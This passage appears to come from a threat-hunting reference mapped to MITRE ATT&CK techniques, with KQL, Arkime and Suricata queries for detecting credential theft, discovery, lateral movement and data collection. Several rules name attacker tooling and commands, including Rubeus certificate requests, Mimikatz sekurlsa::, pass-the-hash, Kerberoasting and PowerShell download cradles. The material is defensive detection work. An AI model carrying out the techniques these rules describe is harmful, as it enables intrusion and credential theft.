Adversaries exploit misconfigured AD CS certificate templates (ESC1-ESC8) to request certificates authenticating as any user including Domain Admins, or steal existing private keys to impersonate users/servers.
KQLWindows โ€” Certificate Services issuing certs to standard users from vulnerable templates
winlog.event_id: 4887 AND winlog.event_data.Requester: "*\\*" AND winlog.event_data.CertificateTemplate: "*WebServer*"
KQLSysmon โ€” Rubeus.exe requesting TGT via certificate
process.name: "Rubeus.exe" AND process.command_line: ("*asktgt*" AND "*/certificate:*")
T1558

Steal or Forge Kerberos Tickets

[MITRE]
Kerberoasting, AS-REP Roasting, Golden Tickets โ€” adversaries request service tickets and crack them offline (RC4 encryption), or forge permanent Domain Admin tickets using stolen krbtgt hashes.
KQLWindows โ€” Kerberoasting: high volume RC4 TGS requests from single user
winlog.event_id: 4769 AND winlog.event_data.TicketEncryptionType: "0x17" AND winlog.event_data.ServiceName: ("*sql*" OR "*svc*" OR "*admin*") | stats count by user.name | where count > 15
ArkimeKerberoasting over wire โ€” TGS-REQ using RC4 encryption
kerberos.msg_type == 14 AND kerberos.ENCTYPE == 23
Discovery TA0007
Techniques adversaries use to gain knowledge about the system and internal network. Discovery occurs throughout an operation and data should be viewed as part of a chain of behavior.
T1007

System Service Discovery

[MITRE]
KQLService discovery commands โ€” sc, net, tasklist, systemctl
event.code: 4688 AND ("sc query" OR (tasklist AND svc) OR (systemctl AND type AND service) OR (net AND start))
"sc query" | tasklist /svc | systemctl --type=service | net start
KQLDetects built-in Windows utilities used for service discovery
event.type: start AND (((process.name: "net.exe") AND process.args: ("start", "use") AND process.args_count == 2) OR ((process.name: "sc.exe") AND process.args: ("query", "q*")) OR ((process.name: "tasklist.exe") AND process.args: "/svc"))
PowerShellPowerShell service discovery
powershell AND Get-Service
T1016

System Network Configuration Discovery

[MITRE]
KQLNetwork config discovery commands โ€” ipconfig, arp, nbtstat, route
event.category: process AND event.type: (start OR process_started) AND process.name: (ipconfig.exe)
event.type: ("start" OR "process_started") AND ((process.name: "nbtstat.exe" AND process.args: ("-n", "-s")) OR (process.name: "arp.exe" AND process.args: "-a"))
process.name: netsh.exe
T1018

Remote System Discovery

[MITRE]
KQLqwinsta โ€” display sessions on remote systems
qwinsta
"System.DirectoryServices.DirectoryEntry" AND LDAP
"show cdp neighbors" | "show arp"
KQLPing and tracert used for host discovery
process.name: (ping.exe OR tracert.exe)
event.code: 4663
PowerShellPowerShell domain computer enumeration
powershell AND Find-DomainLocalGroupMember
T1033

System Owner/User Discovery

[MITRE]
KQLUser/owner discovery via whoami, hostname, id commands
event.category: process AND event.type: (start OR process_started) AND process.name: (whoami.exe OR HOSTNAME.EXE OR who OR whoami)
"net use" OR "quser" OR "query user"
wmic AND useraccount | quser | qwinsta
KQLPowerShell user enumeration commands
powershell AND ("Get-LocalUser" OR "Get-WmiObject Win32" OR "Get-ComputerInfo" OR "Get-Acl" OR "Get-ADUser")
event.code: 4688 AND process.name: at.exe
T1046

Network Service Scanning

[MITRE]
KQLKnown scanning tools executed
process.name: (nmap.exe OR nc.exe OR ping.exe OR tcping.exe OR tracert.exe OR pathping.exe OR osql.exe)
nmap
ArkimeNetwork service discovery โ€” check for multi-port connection attempts
tags == network-service-discovery AND ip.src != <MP IPs>
KQLDetect potential network scan โ€” connection attempts to many ports
event.action: "network-flow"   -- look for one source connecting to 20+ destination ports
T1057

Process Discovery

[MITRE]
KQLtasklist.exe, qwinsta โ€” examine parent, user, working directory
process.name: tasklist.exe
qwinsta
hostname OR ipconfig OR net OR quser OR qwinsta OR systeminfo OR tasklist OR dsquery OR whoami
T1069

Permissions Group Discovery

[MITRE]
KQLLower privilege accounts enumerating admin groups
event.type: ("start" OR "process_started") AND process.name: ("net.exe" OR "net1.exe") AND process.args: ("group" OR "user" OR "localgroup") AND process.args: ("admin" OR "Domain Admins" OR "Remote Desktop Users" OR "Enterprise Admins") AND NOT process.args: "/add"
KQLnet localgroup, net group /domain, Linux groups/ldapsearch
net localgroup
"net group /domain"
groups | ldapsearch   -- Linux
T1082

System Information Discovery

[MITRE]
KQLsysteminfo, netcfg, wmic system info queries
event.category: process AND event.type: (start OR process_started) AND process.name: (systeminfo.exe OR netcfg.exe)
event.type: start AND (process.name: cmd.exe AND process.args: (ver* OR systeminfo.exe OR hostname.exe)) OR (process.name: wmic.exe AND process.args: (os AND get))
T1083

File and Directory Discovery

[MITRE]
KQLtree.com and dir with /F flag โ€” examine parent, user, output destination
process.name: cmd.exe AND process.command_line: *tree* AND process.args: "\/F"
process.name: tree.com
dir OR ls OR find
event.type: "start" AND process.name: "cmd.exe" AND process.args: "/c" AND process.args: ("set" OR "dir")
PowerShellRecursive directory listing via Get-ChildItem
powershell.exe AND get-childitem AND recursive
T1087

Account Discovery

[MITRE]
KQLnet.exe and net1.exe โ€” account discovery via built-in tools
net.exe OR net1.exe
process.command_line: (*net.exe* OR *net1.exe*)
KQLPowerShell account discovery commands
powershell AND (Get-LocalUser OR Get-WmiObject OR Get-NetUser)
winlog.event_id: (4103 OR 4104) AND (*Get-WmiObject* OR *Get-LocalUser* OR *Get-NetUser*)
winlog.event_id: (4103 OR 4104) AND (*Get-DomainUser* OR *Get-ADUser* OR *Get-ADGroupMember*)
KQLnet user commands โ€” local and domain enumeration
"net user"             -- all local accounts
"net user /domain"     -- domain accounts (requires domain creds)
"net user Administrator"
"net account" | "net localgroup"
KQLT1087.001 Local Account โ€” net.exe or PowerShell Get-User
process.name: ("net.exe" OR "net1.exe")
process.name: powershell.exe AND process.command_line: *Get-User*
KQLT1087.002 Domain Account โ€” domain enumeration commands
powershell AND Get-DomainUser
powershell AND (Get-ADUser OR Get-ADGroupMember)
"net user /domain" OR "net group /domain"
event.code: (4798 OR 4799)
KQLMonitoring event IDs for local group enumeration
event.code: (4798 OR 4799)
  4798: User's local group membership enumerated
  4799: Security enabled local group membership enumerated
T1135

Network Share Discovery

[MITRE]
KQLnet view, net share, Get-SmbShare commands
net view OR "net share"
"get-smbshare"
process.command_line: (*smbclient* AND *\-L*)
Image: (*\\net.exe OR *\\net1.exe) AND CommandLine: *view*
T1049

System Network Connections Discovery

[MITRE]
KQLNetwork connection discovery commands
netstat OR qwinsta
"net use"       -- manage network connections / list mapped drives
"net session"   -- active sessions on computer
"netstat -a"    -- active TCP connections
"arp" OR "arp -a"   -- IP to MAC mappings
"netsh interface ip show address"   -- display IP of connected interface
T1012

Query Registry

[MITRE]
KQLreg.exe query command execution
event.type: ("start" OR "process_start") AND process.name: "reg.exe" AND process.args: "query"
event.code: 4657   -- registry value modified
KQLPowerShell PSDrive registry access
event.code: 4103 AND process.command_line: (*New-PSDrive* AND *Registry*) OR process.command_line: (*HKEY_CLASSES_ROOT* OR *HKCR*)
T1482

Domain Trust Discovery

[MITRE]
KQLnltest /domain_trusts โ€” enumerate domain trust relationships
"nltest /domain_trusts"
InfoAdFind.exe is frequently seen in breaches for domain trust discovery. Detects renamed adfind usage via behavior analysis. Also monitor LDAP/MSRPC traffic anomalies for AD enumeration.
AdFind.exe continues to be seen across majority of breaches.
Monitor LDAP and MSRPC traffic for anomalous patterns not matching expected protocol flows.
T1518

Software Discovery

[MITRE]
KQLSecurity software discovery via wmic, netsh, tasklist
netsh AND advfirewall
(wmic.exe OR powershell.exe) AND SecurityCenter
sc AND query AND windefend
tasklist
findstr AND (virus OR cb OR defender OR cylance OR mc)
KQLRegistry query for installed software (UserAssist)
process.name: reg.exe AND process.args: (*query* AND *HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\*)
process.name: reg.exe AND process.command_line: *Software*
KQLWMIC querying SecurityCenter for AV/Firewall info
event.type: (start OR process_started) AND process.name: wmic.exe AND process.args: "/namespace:\\\\root\\SecurityCenter2" AND process.args: "Get"
T1201

Password Policy Discovery

[MITRE]
KQLPassword policy commands by OS
-- Windows:
"net accounts" AND "domain" AND "Get-ADDefaultDomainPasswordPolicy"
-- Linux:
"chage -l"
"cat" AND "/etc/pam.d/common-password"
-- macOS:
"pwpolicy getaccountpolices"
-- Network devices:
"show aaa" OR "show aaa common-criteria policy all"
KQLWindows event logs for Get-ADD* PowerShell commands
winlog.api: wineventlog AND NOT event.code: (7024 OR 7036 OR 7034 OR 9009) AND (winlog.event_data.param1: *Get-ADD* OR winlog.event_data.param2: *Get-ADD*)
T1120

Peripheral Device Discovery

[MITRE]
KQLfsutil.exe used to gather info about peripheral devices
event.type: ("start" OR "process_started") AND process.name: "fsutil.exe" AND process.args: "fsinfo" AND process.args: "drives"
T1124

System Time Discovery

[MITRE]
KQLSystem time discovery commands
process.name: net* AND process.command_line: *time*
event.type: start AND ((process.name: net* AND process.command_line: *time* AND NOT process.args: /set) OR (process.name: w32t* AND process.command_line: *tz*)) AND NOT user.id: ("S-1-5-18" OR "S-1-5-19" OR "S-1-5-20")
event.type: start AND (process.name: tzutil.exe AND process.args: "/g")
T1613

Container and Resource Discovery

[MITRE]
KQLReading /proc virtual filesystem for container discovery indicators
Image: (*awk OR *\/cat OR *grep OR *\/head OR *\/less OR *\/more OR *\/nl OR *\/tail) AND (CommandLine: *\/proc\/2\/* OR (CommandLine: *\/proc\/* AND (CommandLine: (*\/cgroup OR *\/sched))))
KQLContainer enumeration commands
docker ps
docker inspect
kubectl get pods
kubectl get nodes
T1654

Log Enumeration

[MITRE]
KQLLog enumeration via wevtutil, PowerShell Get-EventLog/Get-WinEvent
wevtutil AND <log name>   -- Application, Security, System
process.name: CollectGuestLogs.exe
powershell AND Get-EventLog AND <log name>
powershell AND Get-WinEvent AND LogName
"event viewer" OR eventvwr
%SystemDrive%\\inetpub\\logs\\LogFiles   -- IIS log access
KQLLinux log enumeration
var AND log AND ls
var AND log AND (tail OR head OR more OR cat)
T1087.001

Account Discovery: Local Account

[MITRE]
Adversaries enumerate local accounts on compromised systems to understand the access landscape and identify privileged accounts for escalation or lateral movement.
KQLnet.exe/net1.exe local user/group enumeration โ€” verify legitimacy of caller
process.name: ("net.exe" OR "net1.exe") AND process.command_line: (*user* OR *localgroup* OR *group*)
-- Check: parent process, working dir, RPC exclusions (ruby), user context
KQLPowerShell Get-User local account enumeration
process.name: powershell.exe AND process.command_line: *Get-LocalUser*
T1087.002

Account Discovery: Domain Account

[MITRE]
Adversaries enumerate domain accounts and groups using built-in tools (net, PowerShell AD cmdlets) or third-party tools to identify high-value targets like Domain Admins.
KQLnet user /domain or net group /domain enumeration
process.name: ("net.exe" OR "net1.exe") AND process.command_line: (*/domain*)
process.command_line: (*net user /domain* OR *net group /domain*)
KQLPowerShell domain user/group enumeration cmdlets
process.name: powershell.exe AND process.command_line: (*Get-DomainUser* OR *Get-ADUser* OR *Get-ADGroupMember*)
KQLSecurity event IDs for local/group member enumeration
event.code: (4798 OR 4799)
-- 4798: User's local group membership enumerated
-- 4799: Security-enabled local group membership enumerated
T1010

Application Window Discovery

[MITRE]
Adversaries enumerate visible application window titles to reveal exactly what the user is working on โ€” password managers, internal portals, browsers โ€” without accessing any files.
KQLtasklist /v extracting verbose window titles from running tasks
process.name: "tasklist.exe" AND process.command_line: "* /v *"
T1217

Browser Information Discovery

[MITRE]
Adversaries search Chrome, Edge, and Firefox for bookmarks, browsing history, and installed extensions to map internal web infrastructure without scanning the network directly.
KQLCommand line searching browser artifact databases (Bookmarks, History SQLite)
process.name: ("cmd.exe" OR "powershell.exe" OR "findstr.exe") AND process.command_line: ("*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks*" OR "*\\AppData\\*\\History*")
T1580

Cloud Infrastructure Discovery

[MITRE]
Adversaries burst-enumerate AWS/Azure/GCP resources (VMs, networks, serverless functions) via Describe*/List* API calls to map the cloud architecture and identify compute resources to compromise or hijack.
KQLAggressive enumeration of AWS EC2 instances via CloudTrail
event.dataset: "aws.cloudtrail" AND event.action: "DescribeInstances" | stats count by user.name | where count > 50
T1538

Cloud Service Dashboard

[MITRE]
Adversaries log into cloud management consoles (AWS Management Console, Azure Portal) with stolen credentials or session cookies to visually explore the entire cloud environment via GUI.
KQLAWS Console logins from unknown or unapproved IP addresses
event.dataset: "aws.cloudtrail" AND event.action: "ConsoleLogin" AND event.outcome: "success" AND NOT source.ip: ("[Corporate_IP_Ranges]")
T1526

Cloud Service Discovery

[MITRE]
Adversaries query which cloud services the org uses (Lambda, DynamoDB, EKS) via tools like ScoutSuite or Pacu that enumerate every service endpoint across all regions simultaneously.
KQLWidespread enumeration of Azure services/providers within a subscription
event.dataset: "azure.activitylogs" AND event.action: "Microsoft.Resources/subscriptions/providers/read"
T1619

Cloud Storage Object Discovery

[MITRE]
Adversaries map cloud storage (S3 Buckets, Azure Blob, GCP Buckets) to find database backups, customer PII, or hardcoded credentials โ€” common precursor to massive data exfiltration.
KQLListBuckets / ListObjects API calls โ€” precursor to mass download
event.dataset: "aws.cloudtrail" AND event.provider: "s3.amazonaws.com" AND event.action: ("ListBuckets" OR "ListObjects")
T1622

Debugger Evasion

[MITRE]
Adversaries probe the system for active analysis tools (Wireshark, Sysinternals, x64dbg, sandbox drivers like vboxguest.sys) and alter behavior or terminate to avoid leaving forensic artifacts. Also appears in Defense Evasion.
KQLCommand line utilities querying for specific security or analysis processes
process.name: ("tasklist.exe" OR "wmic.exe") AND process.command_line: ("*wireshark*" OR "*sysmon*" OR "*procmon*")
T1652

Device Driver Discovery

[MITRE]
Adversaries enumerate installed device drivers to find outdated, vulnerable third-party drivers (old AV or hardware diagnostic drivers) that can be exploited locally for kernel-level privilege escalation.
KQLdriverquery.exe or WMI Win32_PnPSignedDriver enumeration
process.name: ("driverquery.exe" OR "powershell.exe") AND process.command_line: ("*driverquery*" OR "*Get-WmiObject Win32_PnPSignedDriver*")
T1615

Group Policy Discovery

[MITRE]
Adversaries enumerate GPOs in Active Directory to understand the domain's security posture โ€” password policies, LAPS configurations, deployed scripts, and mapped drives that reveal privilege escalation paths.
KQLgpresult.exe or PowerShell Get-DomainGPO / Get-GPO enumeration
process.name: ("gpresult.exe" OR "powershell.exe") AND process.command_line: ("* /z*" OR "* /v*" OR "*Get-DomainGPO*" OR "*Get-GPO*")
T1680

Local Storage Discovery

[MITRE]
Adversaries query attached local storage to find unencrypted secondary drives, hidden partitions, or mounted VHDs containing backups, databases, or sensitive files outside the primary OS drive.
KQLdiskpart, wmic logicaldisk, or Get-Volume enumerating physical/logical disk structures
process.name: ("diskpart.exe" OR "wmic.exe" OR "powershell.exe") AND process.command_line: ("*list volume*" OR "*logicaldisk get*" OR "*Get-Volume*")
KQLLinux block device enumeration via lsblk, fdisk, df
process.name: ("lsblk" OR "fdisk" OR "df") AND process.command_line: ("*-l*" OR "*-h*")
T1040

Network Sniffing

[MITRE]
Adversaries passively sniff broadcast traffic (ARP, mDNS, DHCP) to map hosts, OS types, and server relationships without sending a single active scan packet โ€” evading IDS/IPS detection. Also appears in Credential Access.
KQLNetwork sniffing utilities executed by non-root users for passive subnet mapping
process.name: ("tcpdump" OR "tshark" OR "ngrep") AND process.command_line: ("*-i eth0*" OR "*-i any*") AND NOT user.name: "root"
T1614

System Location Discovery

[MITRE]
Adversaries query the host for geographic location via external IP lookup services (ifconfig.me, ipinfo.io), OS language/keyboard settings, or Wi-Fi BSSIDs to verify they hit the intended target rather than a honeypot.
KQLcurl/wget/Invoke-WebRequest reaching external IP identification services
process.name: ("curl.exe" OR "wget.exe" OR "powershell.exe") AND process.command_line: ("*ifconfig.me*" OR "*icanhazip.com*" OR "*ipinfo.io*")
ArkimeHTTP requests to known IP lookup domains (often hardcoded in malware)
host == "ifconfig.me" || host == "icanhazip.com" || host == "ipinfo.io"
T1673

Virtual Machine Discovery

[MITRE]
Adversaries query WMI BIOS manufacturer fields or check MAC address OUIs to determine if running on bare-metal or a VM (VMware, Hyper-V, AWS EC2). Also tied to Virtualization/Sandbox Evasion.
KQLWMI queries targeting system manufacturer โ€” looking for "VMware, Inc." or "Microsoft Corporation"
process.name: ("wmic.exe" OR "powershell.exe") AND process.command_line: ("*computersystem get manufacturer*" OR "*Get-WmiObject Win32_ComputerSystem*")
T1497

Virtualization/Sandbox Evasion

[MITRE]
Malware checks CPU core count, RAM size (<4GB), or analysis tool presence to determine if being run in an automated sandbox before executing its payload. Also appears in Defense Evasion.
KQLSuspicious scripts checking hardware resource limits โ€” classic sandbox evasion check
process.name: ("wmic.exe" OR "powershell.exe") AND process.command_line: ("*memorychip*" OR "*cpu get*")
Lateral Movement TA0008
Techniques adversaries use to move through your environment โ€” pivoting from compromised system to system to reach targets.
T1021

Remote Services

[MITRE]
KQLSSH used to establish RDP over reverse SSH tunnel
event.type: "start" AND process.args: "*:3389" AND process.args: ("-L" OR "-P" OR "-R" OR "-pw" OR "-ssh")
process.args: ("-L" OR "-P" OR "-R" OR "-pw" OR "-ssh") AND process.args: *3389*
KQLDCOM/HTA lateral execution (mshta with -Embedding)
event.type: ("start" OR "process_started") AND process.name: "mshta.exe" AND process.args: "-Embedding"
InfoSuspicious command line patterns commonly seen in lateral movement tools
PuTTY port forwarding: -R * -pw
Secure copy (scp): -pw * * @
Mimikatz: sekurlsa::
RAR encryption: -hp
Look for IP patterns: \d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}
T1021.001

Remote Desktop Protocol

[MITRE]
KQLRDP connection via mstsc.exe, port changes, failed access
event.action: creation AND process.name: mstsc.exe
event.action: "Network connection detected" AND destination.port: 3389 AND NOT process.executable: ("C:\\Windows\\System32\\mstsc.exe" OR "C:\\Windows\\System32\\svchost.exe")
"reg add" OR "GE_DWORD" OR ("RDP-TCP" AND "PortNumber")   -- RDP port change
KQLFailed RDP attempts and local loopback RDP sessions
winlog.channel: Security AND event.code: 4825   -- Failed RDP auth by authenticated user
winlog.channel: Security AND event.code: 4624 AND winlog.event_data.LogonType: 10 AND source.ip: ("::1" OR "127.0.0.1")   -- Local loopback RDP (RDP hijacking precursor)
KQLStartup files dropped via mstsc.exe (persistence after lateral movement)
(process.name: mstsc.exe OR process.pid: 4) AND file.path: *Microsoft*Startup*
T1021.004

Remote Services: SSH

[MITRE]
ArkimeSSH and PuTTY traffic
port == 22 || protocols == ssh
putty.exe OR plink.exe OR pscp.exe
T1021.006

Remote Services: WinRM

[MITRE]
KQLWinRM execution indicators โ€” wsmprovhost, wmiprvse
wsmprovhost.exe
process.name: wmiprvse.exe
winrm
ArkimeWinRM traffic on ports 5985 (HTTP) and 5986 (HTTPS)
protocols == http AND port == 5985
destination.port: 5985 AND (network.protocol: http OR log.file.path: *http.log)
T1210

Exploitation of Remote Services

[MITRE]
ArkimeRemote service protocols โ€” RDP, Telnet, SSH, VNC, VPN
protocols == rdp  || port == 3389
protocols == telnet || port == 23
protocols == ssh || port == 22
protocols == vnc || port == 5900
protocols == [openvpn, wireguard, ike2, ipsec, pptp, sstp] || port == [500, 4500, 443, 1194, 51820, 1723]
KQLWindows remote services event codes
event.code: (1149 OR 21 OR 25 OR 1024)
  1149: RDP auth succeeded | 21: Session logon | 25: Session reconnect | 1024: RDP client connection
T1534

Internal Spearphishing

[MITRE]
ArkimeInternal email traffic on email ports โ€” review all
port.dst == [25, 143, 993, 110, 995]
email.fn == EXISTS!
KQLMacro-enabled attachment click from Outlook (PowerShell download)
powershell AND "Invoke-WebRequest" AND "-OutFile"
event.code: 4663 AND file.extension: "url" AND NOT process.name: "explorer.exe"
KQLAny suspicious process from Outlook (internal phishing)
event.action: "Process Create (rule: ProcessCreate)" AND process.parent.name: outlook.exe AND process.name: (arp.exe OR bitsadmin.exe OR certutil.exe OR cmd.exe OR cscript.exe OR mshta.exe OR net.exe OR nltest.exe OR ping.exe OR powershell.exe OR reg.exe OR regsvr32.exe OR sc.exe OR schtasks.exe OR tasklist.exe OR whoami.exe OR wmic.exe OR wscript.exe)
T1570

Lateral Tool Transfer

[MITRE]
ArkimeSMB traffic to/from hosts of interest
protocols == smb AND ip == [<IPs of interest>]
KQLWindows Filtering Platform blocking connections (lateral movement blocked)
event.code: (5157 OR 5159 OR 5155 OR 5031)
  5157: WFP blocked connection | 5159: WFP blocked bind to port
  5155: WFP blocked app from listening | 5031: Windows Firewall blocked incoming connection
KQLNetwork share access events โ€” monitor for unexpected file transfers
event.code: (5140 OR 5142 OR 5144 OR 5145)
  5140: Network share accessed | 5142: Share added | 5144: Share deleted | 5145: Share access check
T1091

Replication Through Removable Media

[MITRE]
KQLRemovable media access events
event.code: 4663 AND "removable storage"
T1563

Remote Service Session Hijacking

[MITRE]
With SYSTEM privileges, adversaries use tscon.exe to hijack a Domain Admin's disconnected RDP session, gaining full admin access without needing their password or triggering an authentication event.
KQLtscon.exe connecting to a different session ID โ€” RDP session hijack indicator
process.name: "tscon.exe" AND process.command_line: ("* /dest:*" OR "* /v *") AND NOT user.name: "SYSTEM"
InfoNetwork visibility note โ€” session hijack is host-only
Session hijacking occurs inside host OS memory and Terminal Services. Network traffic continues to look like a normal encrypted RDP stream. Rely entirely on endpoint/process logs.
T1072

Software Deployment Tools

[MITRE]
Hijacking a central IT deployment server (SCCM, Intune, PDQ Deploy, Ansible) allows pushing malware to thousands of endpoints simultaneously via highly trusted SYSTEM-level agents. Also appears in Execution.
KQLSoftware deployment agents spawning anomalous or destructive commands
process.parent.name: ("CcmExec.exe" OR "IntuneManagementExtension.exe" OR "PDQDeploy.exe") AND process.name: ("powershell.exe" OR "cmd.exe") AND process.command_line: ("*DownloadString*" OR "*vssadmin*" OR "*Net.WebClient*")
T1080

Taint Shared Content

[MITRE]
Instead of hacking a remote machine directly, adversaries place malicious LNK shortcuts or macro-enabled documents on heavily used corporate network shares and wait for users from other departments to open them.
KQLCreation of malicious shortcuts or scripts on central file servers (Event ID 5145)
winlog.event_id: 5145 AND winlog.event_data.RelativeTargetName: ("*.lnk" OR "*.vbs" OR "*.wsf" OR "*.scr") AND winlog.event_data.AccessMask: "0x2"
ArkimeSMB writes of executable/script files to non-administrative file shares
protocols == smb && smb2.filename == r".*\.(lnk|vbs|scr)$"
T1550

Use Alternate Authentication Material

[MITRE]
Pass-the-Hash (PtH) and Pass-the-Ticket (PtT) let adversaries authenticate via SMB or WinRM using stolen NTLM hashes or Kerberos tickets without ever knowing the plaintext password or triggering MFA. Also in Defense Evasion.
KQLPass-the-Hash indicator โ€” Logon Type 9 (NewCredentials) with seclogo process
winlog.event_id: 4624 AND winlog.logon.type: 9 AND winlog.event_data.LogonProcessName: "seclogo"
InfoNetwork visibility note โ€” PtH looks like legitimate NTLM
Over the network, a PtH attack looks exactly like a legitimate NTLM authentication sequence. Network tools cannot distinguish a stolen hash from a legitimately hashed password. Rely on endpoint logging.
Collection TA0009
Techniques adversaries use to gather information from various sources in your environment prior to exfiltration.
T1005

Data from Local System

[MITRE]
ArkimeSMB traffic to hosts of interest
protocols == smb AND ip == [<IPs of interest>]
KQLWindows Filtering Platform events for blocked connections
event.code: (5157 OR 5159 OR 5155 OR 5031)
KQLSQL commands โ€” look for SQL data collection via SQLCMD
"SELECT" AND "FROM" AND "WHERE"
process.name: (SQLCMD.EXE OR sqlcmd.exe)
KQLRecon commands for local data discovery
event.type: start AND ("systeminfo" OR "ipconfig" OR "hostname" OR "net user" OR "net localgroup" OR "net group" OR "net share" OR "net view" OR "netstat" OR "*tasklist*" OR "dir*" OR "ls*")
T1025

Data from Removable Media

[MITRE]
KQLFile access on removable storage
event.code: 4663 AND event.action: "Removable Storage"
event.code: 4663 AND NOT winlog.event_data_ObjectName: "C:\\*" AND winlog.event_data.ObjectType: File
PowerShellIdentify documents on USB/removable media via PowerShell
process.name: powershell.exe AND process.command_line: (*Get-Volume* AND *Removable*)
T1039

Data from Network Shared Drive

[MITRE]
KQLSMB port 445 access โ€” unexpected/abnormal network share access
destination.port: 445
destination.port: 445 AND NOT source.ip: <int IPs>
ArkimeHTTP URIs with suspicious executable/archive file extensions
http.uri == [*.exe, *.dll, *.zip, *.7z, *.php, *.aspx] AND http.uri != [*google*, *windowsupdate*]
http.uri: (*.exe OR *.dll OR *.zip OR *.7z OR *.rar OR *.raw OR *.iso OR *.php OR *.aspx) AND NOT http.uri: (*google* OR *windowsupdate*)
T1074.001

Data Staged: Local Data Staging

[MITRE]
KQLFiles staged in Temp or Recycle Bin directories
file.path: ("*C:\\Windows\\Temp*" OR "*$Recycle.Bin*")
file.path: (*Temp* OR *temp* OR *Recycle*)
T1114

Email Collection

[MITRE]
KQLLocal system email file access (Sysmon event 10)
event.code: 10 AND TargetImage: (*.edb OR *.eml OR *.emlx OR *.mbox OR *.msg OR *.ost OR *.pst OR *.vcf)
KQLT1114.001 Local Email Collection โ€” PST/OST file access via command line
process.command_line: (*ost* OR *pst*)
KQLT1114.002 Remote Email Collection โ€” Exchange mailbox export request
process.name: (powershell.exe OR pwsh.exe OR powershell_ise.exe) AND process.args: New-MailboxExportRequest*
ArkimeSMTP protocols and common email ports
protocols == smtp || port.dst == [110, 146, 465, 587, 993, 995]
ArkimeSMTP traffic with attachments and external connections (possible exfil via forwarding)
protocols == smtp AND email.has-header.value == Forward AND email.md5 == EXISTS!
KQLPowerShell cmdlet for email collection (event 4104)
event.code: 4104
-- look for: Get-Inbox
T1113

Screen Capture

[MITRE]
KQLPowerShell screen capture via System.Drawing.Bitmap
event.category: process AND powershell.file.script_block_text: (CopyFromScreen AND ("System.Drawing.Bitmap" OR "Drawing.Bitmap"))
T1115

Clipboard Data

[MITRE]
KQLClipboard access via clip.exe or Get-Clipboard
process.name: clip.exe
process.command_line: *Get-Clipboard*
T1119

Automated Collection

[MITRE]
KQLAutomated collection via scripts โ€” compressed file creation in temp/appdata
event.code: (11 OR 1) AND <compressed file extension>
event.code: 11 AND *.(zip OR rar OR 7z) AND (C:\\Windows\\temp\\* OR %APPDATA%\\temp* OR appdata\\local\\temp)
event.code: 4688 AND parent.process.name: (cscript.exe OR wscript.exe)
event.code: 4663 AND (C:\\Windows\\temp\\* OR %APPDATA%\\temp* OR appdata\\local\\temp)
ArkimeSMB/FTP/email transfers of compressed files
smb.fn == *.<compression ext>
ftp.fn == *.<compression ext>
email.fn == *.<compression ext>
T1123

Audio Capture

[MITRE]
KQLSoundRecorder or PowerShell audio capture tools
process.name: Soundrecorder.exe
process.name: powershell.exe AND process.command_line: *WindowsAudioDevice-Powershell-Cmdlet*
KQLPowerShell script block text with audio capture APIs
event.category: process AND powershell.file.script_block_text: ("Get-MicrophoneAudio" OR "WindowsAudioDevice-Powershell-Cmdlet" OR (waveInGetNumDevs AND mciSendStringA)) AND NOT user.id: "S-1-5-18"
KQLKnown audio capture applications and audio DLLs
process.name: (*audio* OR *sound* OR *microphone*) AND NOT process.parent.name: (explorer.exe OR *system*)
file.type: dll AND (avrt OR winmm OR msacm32)
Audacity OR "screen capture" OR Ardour OR Ocenaudio
T1213

Data from Information Repositories

[MITRE]
SuricataSMB file exfiltration detection rule
alert smb any any -> any any (msg:"SMB File Exfiltration Detected"; flow:established; file_data; fileext:"pdf,docx,xlsx,pptx"; filemagic:"%PDF-,%DOC-,%SLX-,%PPT-"; content:"NT Trans Request"; depth:15; sid:1000001; rev:1;)
KQLT1213.002 SharePoint โ€” audit log events (requires LOGbinder or similar)
event.code: (13 OR 14)    -- document checked out/in
event.code: (47 OR 48 OR 49 OR 50)   -- document/list viewed
event.code: (15 OR 19 OR 39)    -- object deleted/restored
event.code: (11 OR 12 OR 20 OR 25 OR 26 OR 27 OR 28 OR 29)   -- user/permission edits
T1560

Archive Collected Data

[MITRE]
KQLWinRAR or 7z creating encrypted archives (pre-exfiltration staging)
event.type: ("start" OR "process_started") AND ((process.name: "rar.exe" OR process.pe.original_file_name: "Command line RAR") AND process.args: "a" AND process.args: ("-hp*" OR "-p*" OR "-dw" OR "-tb" OR "-ta" OR "/hp*" OR "/p*")) OR (process.pe.original_file_name: ("7z.exe" OR "7za.exe") AND process.args: "a" AND process.args: ("-p*" OR "-sdel"))
KQLT1560.001 Archive via Utility โ€” all common archivers
event.category: process_creation AND process.name: (7z.exe OR 7za.exe OR winzip.exe OR winzip64.exe OR rar.exe OR winrar.exe)
process.name: powershell.exe AND process.command_line: *Compress-Archive*
process.name: 7z*.exe AND process.command_line: *-p *   -- password-protected archive
KQLCompressed file creation/modification events
file.name: (*.zip OR *.7z OR *.rar OR *.gzip OR *.tar) AND event.type: creation
(event.type: "file_created" OR event.type: "file_modified") AND file.extension: ("zip" OR "rar" OR "7z")
T1114.001

Email Collection: Local Email Collection

[MITRE]
Adversaries access locally stored email files (OST/PST) to steal email contents without network access to the mail server.
KQLProcess command line referencing .ost or .pst email archive files
process.command_line: (*.ost* OR *.pst*)
T1114.002

Email Collection: Remote Email Collection

[MITRE]
Adversaries access email from remote mail servers using legitimate APIs or protocols (Exchange, Office 365). PowerShell New-MailboxExportRequest is commonly abused on Exchange.
KQLPowerShell New-MailboxExportRequest โ€” exports entire Exchange mailbox
process.name: (powershell.exe OR pwsh.exe OR powershell_ise.exe) AND process.args: *New-MailboxExportRequest*
T1213.002

Data from Information Repositories: SharePoint

[MITRE]
Adversaries collect sensitive data from SharePoint collaboration repositories. Requires SharePoint audit logs enabled and fed into Elastic (e.g., via LOGbinder).
KQLSharePoint document check-out/in and view events (via LOGbinder audit codes)
-- Document checked out/in:
event.code: (13 OR 14)
-- Document/list viewed:
event.code: (47 OR 48 OR 49 OR 50)
-- Objects deleted/restored:
event.code: (15 OR 19 OR 39)
-- User and permission changes:
event.code: (11 OR 12 OR 20 OR 25 OR 26 OR 27 OR 28 OR 29 OR 30 OR 31 OR 32 OR 33 OR 34 OR 35 OR 36 OR 37 OR 38)
T1560.001

Archive Collected Data: Archive via Utility

[MITRE]
Adversaries use standard archive utilities (7zip, WinRAR, WinZip) to compress and optionally encrypt collected data prior to exfiltration.
KQLArchive utility process creation โ€” 7z, WinRAR, WinZip
